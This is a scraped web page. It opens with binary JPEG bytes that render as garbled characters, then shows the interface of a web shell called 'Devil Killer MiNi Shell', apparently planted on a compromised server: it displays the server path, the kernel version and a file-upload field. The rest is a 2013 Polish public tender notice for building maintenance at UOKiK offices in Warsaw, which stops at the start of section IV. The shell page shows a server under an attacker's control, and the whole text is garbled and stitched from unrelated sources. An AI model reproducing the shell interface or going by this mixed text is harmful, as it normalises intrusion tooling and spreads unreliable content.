JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131016/215815-N-2013.html

<p class="kh_header"><b>Warszawa: Konserwacja stała instalacji elektrycznej, ciepłej i zimnej wody, kanalizacji i centralnego ogrzewania, drobne naprawy stolarki budowlanej, niewielkie prace gospodarcze i transportowe w budynku Centrali Urzędu Ochrony Konkurencji                        i Konsumentów przy placu Powstańców Warszawy 1 oraz w lokalu Laboratorium Kontrolno-Analitycznego Urzędu Ochrony Konkurencji i Konsumentów przy                               ul. Sienkiewicza 3 w Warszawie</b><br>
<b>Numer ogłoszenia: 215815 - 2013; data zamieszczenia: 16.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja stała instalacji elektrycznej, ciepłej i zimnej wody, kanalizacji i centralnego ogrzewania, drobne naprawy stolarki budowlanej, niewielkie prace gospodarcze i transportowe w budynku Centrali Urzędu Ochrony Konkurencji                        i Konsumentów przy placu Powstańców Warszawy 1 oraz w lokalu Laboratorium Kontrolno-Analitycznego Urzędu Ochrony Konkurencji i Konsumentów przy                               ul. Sienkiewicza 3 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia

Centrala Urzędu Ochrony Konkurencji
Konserwacja instalacji elektrycznej wraz z rozdzielnią główną niskiego napięcia, instalacji odgromowej, instalacji centralnego ogrzewania i węzła cieplnego, instalacji ciepłej i zimnej wody wraz z odbiornikami zainstalowanymi na stałe oraz kanalizacji odprowadzającej ścieki i wody opadowe oraz obsługa, naprawy i utrzymanie w sprawności technicznej wymienionych instalacji wraz z wbudowanymi w nie urządzeniami. Wykonywanie prac naprawczych mebli, stolarki 
i ślusarki drzwiowej, ścian wewnętrznych do 1 m2 i innych drobnych napraw, a także niewielkich prac gospodarczych i transportowych wewnątrz i na zewnątrz budynku biurowego przy Placu Powstańców Warszawy 1 w Warszawie. 
Opis budynku. 
Budynek średniowysoki (24,6m), 7-kondygnacyjny, podpiwniczony, o powierzchni łącznej                    ca. 14500 m2, posadowiony na działce równej powierzchni zabudowy. 
Budynek wyposażony jest w następujące instalacje: 
-zimnej i ciepłej wody, 
-kanalizacyjną sanitarną, 
-kanalizacyjną deszczową,
-centralnego ogrzewania wraz z węzłem cieplnym, 
-elektryczną, 
-oświetleniową,
-oświetlenia awaryjnego,
-odgromową, 
-wodociągową przeciwpożarową, 
-wentylacji grawitacyjnej, 
-wentylacji mechanicznej - w części pomieszczeń piwnicznych. 
Przedmiot zamówienia obejmuje w szczególności
1.	Konserwację stałą i naprawy
a)	instalacji elektrycznej i rozdzielni elektrycznej niskiego napięcia,
b)	instalacji oświetlenia awaryjnego
c)	instalacji oświetlenia terenu wokół budynku (zasilanej z budynku),
d)	instalacji odgromowej,
e)	instalacji centralnego ogrzewania i węzła ciepłowniczego,
f)	instalacji ciepłej i zimnej wody,
g)	kanalizacji odprowadzającej ścieki i wody opadowe,
h)	stolarki i ślusarki drzwiowej i mebli (naprawa i wymiana zamków, zawiasów, klamek itp.),
i)	ścian wewnętrznych - likwidacja uszkodzeń mechanicznych i zacieków 
o powierzchni nie przekraczającej 1m2.
2.	Utrzymanie w sprawności technicznej następujących instalacji wraz z urządzeniami
a)	rozdzielni niskiego napięcia i instalacji elektrycznej - od zacisków WLZ w rozdzielni niskiego napięcia do gniazd wtykowych, opraw oświetleniowych wewnątrz i na zewnątrz budynku,
b)	instalacji odgromowej w zakresie połączeń,
c)	instalacji co. oraz węzła ciepłowniczego - od zaworów sieciowych Dalkia (d. SPEC), odcinających wysokie parametry do grzejników włącznie,
d)	instalacji ciepłej i zimnej wody - od wodomierza do baterii umywalkowych, zlewozmywakowych i spłuczek włącznie,
e)	kanalizacji odprowadzającej ścieki - od odbiorników (umywalek, zlewozmywaków, pisuarów, sedesów) do wyjścia poziomu w ścianie frontowej piwnicy,
f)	kanalizacji odprowadzającej wody opadowe z dachu do wyjścia poziomu w ścianie frontowej piwnicy.
3.	Czynności obsługowe instalacji elektrycznej
Codzienna i okresowa konserwacja oraz naprawy rozdzielni niskiego napięcia, tablic piętrowych, instalacji elektrycznych wewnętrznych, instalacji odgromowej
a)	wykonywanie czynności konserwacyjnych zgodnie z instrukcją rozdzielni, 
b)	oględziny rozdzielni niskiego napięcia i ocena poprawności działania - 1 raz w tygodniu,
c)	wymiana gniazd wtykowych, żarówek, świetlówek (tylko na powierzchniach UOKiK), załączanie wyłączników różnicowo - prądowych i nadmiarowych itp., -wykonywane na bieżąco w miarę potrzeby,
d)	naprawy i wymiana osprzętu i wyposażenia elektrycznego budynku lamp oświetleniowych terenu zewnętrznego, opraw oświetleniowych w pomieszczeniach, żyrandoli, poprawianie mocowania gniazd wtykowych, wyłączników klawiszowych itp. - wykonywane na bieżąco w miarę potrzeby,
e)	odczytywanie  jeden raz w miesiącu wskazań podliczników energii elektrycznej 
i przekazywanie ich na piśmie Zamawiającemu - najpóźniej do 5 dnia każdego miesiąca,
f)	utrzymanie w czystości elektrycznych tablic piętrowych - odkurzanie wewnątrz i na zewnątrz oraz sprawdzanie stanu technicznego - 2 razy w roku - w lipcu 
i w lutym- pisemne zgłoszenie Zamawiającemu wykonanej czynności.
g)	okresowa - dwukrotna w ciągu roku - kontrola instalacji oświetlenia awaryjnego,
h)	okresowe - 2 razy w roku w październiku i w kwietniu - sprawdzanie stanu połączeń instalacji odgromowej oraz zabezpieczenie połączeń przed wpływami atmosferycznymi.
Wymiana gniazd wtykowych, żarówek, świetlówek, naprawy opraw oświetleniowych, przedłużaczy, poprawianie mocowania gniazd wtykowych, o czym mowa w pkt 3 lit. c, obejmuje następujące części budynku 
a)	hol główny, główna klatka schodowa, sanitariaty w głównej klatce schodowej, oraz boczne klatki schodowe, 
b)	na I piętrze (strona A) - korytarz, pomieszczenia biurowe, sanitariaty i kuchenka, 
c)	na III piętrze(strona B) - część korytarza od bocznej klatki schodowej do szczytu budynku, pomieszczenia biurowe, sanitariaty, kuchenka,
d)	na IV piętrze (strona B) - pomieszczenia biurowe, sanitariaty, korytarz, kuchenka,
e)	na V piętrze - pomieszczenia biurowe, sanitariaty, oba korytarze, kuchenki, pomieszczenia biurowe w głównej klatce schodowej
f)	na VI piętrze - pomieszczenia biurowe w korytarzach, sanitariaty, oba korytarze, kuchenki, pomieszczenie numer 637w holu głównym,
g)	pomieszczeń Centrum Konferencyjno Szkoleniowego,
h)	pomieszczenie dla kierowców, warsztat, pomieszczenia ochrony, piwnice, strych.

3.1.	Instalacja co., c.c.w., węzeł ciepłowniczy
a)	przygotowanie instalacji i węzła do sezonu grzewczego, poinformowanie pisemnie Zamawiającego o wykonaniu tej czynności najpóźniej do 10 września,
b)	odpowietrzanie instalacji i grzejników, uzupełnianie wody w instalacji, konserwacja 
i wymiana zaworów, usuwanie przecieków itp., 
c)	przegląd instalacji i urządzeń węzła ciepłowniczego w zakresie sprawności działania 
i szczelności - 1 raz w roku - do 31 marca; poinformowanie pisemne Zamawiającego                                o wykonaniu zadania i zgłoszenie uwag o aktualnym stanie technicznym węzła.
3.2.	Instalacja ciepłej i zimnej wody
a)	usuwanie przecieków i nieszczelności, wymiana uszczelek, zaworów, wężyków itp.,
b)	naprawa lub wymiana baterii, spłuczek itp.
            Konserwacja i naprawa baterii umywalkowych, zlewozmywakowych i  
            spłuczek, obejmuje pomieszczenia WC i kuchenki
-w holu głównym,
-na I piętrze -  strona A, 
-na III piętrze - strona B część korytarza od bocznej klatki schodowej do szczytu budynku,
-na IV piętrze - strona B, 
-na V piętrze,
-na VI piętrze, 
-pomieszczenie dla kierowców, warsztat i piwnice.
-pomieszczeń Centrum Konferencyjno Szkoleniowego

3.3.	Kanalizacja odprowadzająca ścieki i wody opadowe
a)	udrażnianie kanalizacji i rur spustowych odprowadzających ścieki i wody opadowe, usuwanie przecieków itp.,
b)	czyszczenie koryt (zbierających i odprowadzających wody opadowe) na pierwszym                             i szóstym piętrze oraz dachu przybudówki, w tym czyszczenie kratek ściekowych - minimum raz na kwartał,
c)	uzupełnianie plastikowych zabezpieczeń na kratkach ściekowych na gzymsie VI piętra.
d)	wykonywanie koniecznych uszczelnień i napraw wlotów rur spustowych wód opadowych.
3.4.	Instalacja hydrantowa
a)	codzienna kontrola techniczna zestawu pompowego ppoż. pod kątem szczelności 
i właściwego ciśnienia, 
b)	codzienna kontrola szafek hydrantowych pod kątem szczelności zaworów i na okoliczność  nienaruszenia  plomb.
c)	 informowanie Zamawiającego o każdej stwierdzonej nieprawidłowości.
3.5.	Obsługa budynku 
a)	obsługa sal konferencyjnych (zmiana wielkości sali poprzez zmianę konfiguracji ścian przesuwnych, przenoszenie i ustawianie krzeseł i stołów), 
b)	prace przy zmianie wystroju pokoi biurowych np. montaż i demontaż wieszaków, tablic ogłoszeniowych, karniszy, żaluzji, desek odbojowych, itp.,
c)	prace gospodarcze np. naprawa drzwi, pomoc przy zmianie wystroju budynku w okresach świątecznych, wymiana baterii elektrycznych i wkładów zapachowych w odświeżaczach powietrza w WC,
d)	prace transportowe np. przenoszenie małogabarytowego sprzętu, dokumentów, druków na terenie budynku i dostaw do budynku, przenoszenie mebli (w przypadku przeprowadzek pojedynczych pokoi), 
e)	czyszczenie i smarowanie prowadnic drzwi wejściowych automatycznych 1 raz na tydzień,
f)	codzienna kontrola prawidłowości działania drzwi aluminiowych,
g)	utrzymanie czystości i porządku w pomieszczeniach technicznych,
h)	wprowadzanie pracowników zakładu energetycznego do rozdzielni NN w celu odczytania wskazań liczników energii elektrycznej , 
i)	wprowadzanie pracowników MPWiK do pomieszczeń wodomierzy w celu dokonania odczytu wskazań,
j)	codzienna kontrola działania central (nawiewnej i wywiewnej) instalacji wentylacji mechanicznej w węźle ciepłowniczym oraz Centrum Konferencyjno Szkoleniowym                         i natychmiastowe informowanie Zamawiającego o każdej zauważonej nieprawidłowości,
k)	dozorowanie robót instalacyjnych i innych, wykonywanych na dachu przez firmy 
z zewnątrz - w aspekcie uniknięcia uszkodzenia pokrycia dachu i uszkodzenia urządzeń zainstalowanych na dachu,
l)	zapewnienie - na bieżąco - prawidłowego zamocowania gaśnic w przeznaczonych do tego uchwytach, 
m)	codzienne przeglądy łazienek, kuchenek, ciągów komunikacyjnych, elektrycznych tablic piętrowych pod kątem oceny prawidłowości działania armatury, pionów i podejść odpływowych kanalizacyjnych, instalacji elektrycznej oraz oświetlenia,
n)	usuwanie na bieżąco zauważonych uszkodzeń i awarii i powiadamianie Zamawiającego                     o usterkach nie do usunięcia na bieżąco,
o)	raz w roku i na życzenie Zamawiającego porządkowanie okablowania we wskazanych pomieszczeniach, zajmowanych przez UOKiK pod kątem podziału na gniazda sieci ogólnej i komputerowej,       a także zgodności z przepisami BHP oraz zasadami ergonomii. 
p)	utrzymywania w czystości urządzeń elektrycznych w budynku, żyrandoli, lamp oświetleniowych, kloszy, itp., 
q)	drobne naprawy elementów wyposażenia technicznego i mebli niewymagające autoryzowanego serwisu, specjalistycznej wiedzy ani narzędzi,
r)	naprawa uszkodzeń tynków ścian wewnętrznych budynku na powierzchniach nie przekraczających 1m2.
s)	wykonywanie innych drobnych prac, zleconych przez Zamawiającego.
Termin realizacji zamówienia: od dnia 01.01.2014 do dnia 31.12.2014 r. 

Laboratorium Kontrolno Analityczne Urzędu Ochrony Konkurencji i Konsumentów
Konserwacja instalacji elektrycznej, instalacji ciepłej i zimnej wody wraz z odbiornikami zainstalowanymi na stałe oraz kanalizacji, naprawy i utrzymanie w sprawności technicznej wymienionych instalacji, wykonywanie drobnych prac naprawczych mebli i stolarki drzwiowej                    w Laboratorium Kontrolno Analitycznym Urzędu Ochrony Konkurencji i Konsumentów, znajdującym się na V piętrze w budynku biurowym przy ul. Sienkiewicza 3 w Warszawie.

Opis lokalu 
Lokal o powierzchni 310 m2, usytuowany na V piętrze kamienicy, znajdującej się 
w bezpośrednim sąsiedztwie budynku stanowiącego główny obiekt zamówienia. 
Lokal wyposażony jest w następujące instalacje
-elektryczną, 
-oświetleniową,
-zimnej i ciepłej wody, 
-centralnego ogrzewania,
-kanalizacyjną,
-lokalną przepompownię ścieków.
Przedmiot zamówienia obejmuje w szczególności
1.	Naprawy i wymianę osprzętu i wyposażenia elektrycznego lamp oświetleniowych, kontrola zamocowania w puszkach  gniazd wtykowych i włączników ściennych,
2.	Wymianę gniazd wtykowych, żarówek, świetlówek, załączanie wyłączników różnicowo-prądowych i nadmiarowych,
3.	Na życzenie Zamawiającego porządkowanie okablowania we wskazanych pomieszczeniach pod kątem podziału na gniazda sieci ogólnej i komputerowej, a także zgodności                                   z przepisami BHP oraz zasadami ergonomii. 
4.	Usuwanie przecieków i nieszczelności w instalacji ciepłej i zimnej wody, wymiana uszczelek, zaworów, wężyków itp.,
5.	Naprawy i wymiana armatury łazienkowej, 
6.	Naprawy przepompowni kanalizacji lokalnej,
7.	Wymianę elementów stolarki drzwiowej i meblowej, takich jak zamki, klamki, zawiasy itp.
8.	Drobne naprawy elementów wyposażenia technicznego i mebli niewymagające autoryzowanego serwisu, specjalistycznej wiedzy ani narzędzi,
9.	Naprawa uszkodzeń tynków ścian wewnętrznych lokalu na powierzchniach nie przekraczających 1m2. 
10.	Doraźne prace gospodarcze o charakterze fizycznym. 


Termin realizacji zamówienia: od dnia 01.01.2014 do dnia 31.12.2014 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiajacego warunku posiadania przez Wykonawcę niezbednej wiedzy i doświadczenia Wykonawca musi złożyć dokumenty na podsatwie których Wykonawca wykaże, że w okresie ostatnich trzech lat przed  upływem terminu składania ofert o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej dwa zamówienia odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ, tj. Wykonawca zrealizował co najmniej dwie usługi z zakresu utrzymania budynku biurowego o powierzchni nie mniejszej niż 10 000 m2 każda w sprawności technicznej instalacji elektrycznych, ciepłej i zimnej wody, kanalizacji, centralnego ogrzewania wraz z urządzeniami.
Podane wielkości muszą dotyczyć jednego zamówienia (przez co rozumie się, że musi wynikać z jednostkowej umowy).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiającego warunku dotyczącego
spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca powinien załączyć do oferty Wykaz sprzętu i urządzeń, jakich Wykonawca zamierza użyć do wykonania usługi, stanowiący Załącznik Nr 8 do SIWZ zgodnie z wymaganiami Zamawiajacego wymienionymi w szczegółowym opisie przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.	W celu potwierdzenia opisanego przez Zamawiającego warunku dotyczącego
spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca musi załączyć do oferty Wykaz osób, które będą wykonywały zamówienie wypełniony zgodnie z formularzem określonym w Załączniku Nr 6 do SIWZ. Ponadto Wykonawca musi wykazać się, że na czas realizacji będzie dysponował
- co najmniej jedną osobą z uprawnieniami kwalifikacyjnymi uprawniającymi do zajmowania się eksploatacją sieci, urządzeń i instalacji energetycznych wytwarzających                     i zużywających energię elektryczną o napięciu do 1 kV wydanymi zgodnie                                     z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad, stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci - § 5 ust.1, pkt. 1, załącznik nr 1, grupa 1 pkt. 2 (Dz. U. Nr 89, poz. 828 ze zm.), 
- co najmniej jedną osobą posiadającą uprawnienia kwalifikacyjne uprawniające do zajmowania się eksploatacją sieci i instalacji cieplnych wraz z urządzeniami pomocniczymi, o przesyle ciepła powyżej 50 kW - § 5 ust.1, pkt. 1 , załącznik nr 1, grupa 2 pkt. 2 i 4,
- co najmniej jedną osobą posiadającą ważne uprawnienia do wykonywania prac wysokościowych. 
Pracownicy zatrudnieni przez Wykonawcę na terenie budynku muszą posiadać minimum czteroletni staż pracy w zawodzie, umiejętność odczytywania rysunków technicznych instalacji c.o., c.w., wod-kan. oraz schematów instalacji elektrycznych,                  a ponadto wykazywać się sprawnością fizyczną umożliwiającą wykonywanie cięższych prac fizycznych.
Wykonawca wskaże osobę sprawującą nadzór nad pracownikami, spełniającą wymagania kwalifikacyjne dla osób zatrudnionych na stanowisku dozoru sieci, urządzeń i instalacji energetycznych wytwarzających i zużywających energię elektryczną o napięciu do 15 kV, zgodnie z Rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia                           28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci - § 5 ust.1 pkt. 2 (Dz. U. Nr 89, poz. 828 ze zm.) Osoba ta musi zapoznać się z układem energetycznym i instalacją elektryczną budynku w ciągu maksymalnie 2 tygodni po podpisaniu umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia opisanego przez Zamawiajacego warunku dotyczacego sytuacji ekonomicznej i finansowej, Wykonawca powinien do oferty załączyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
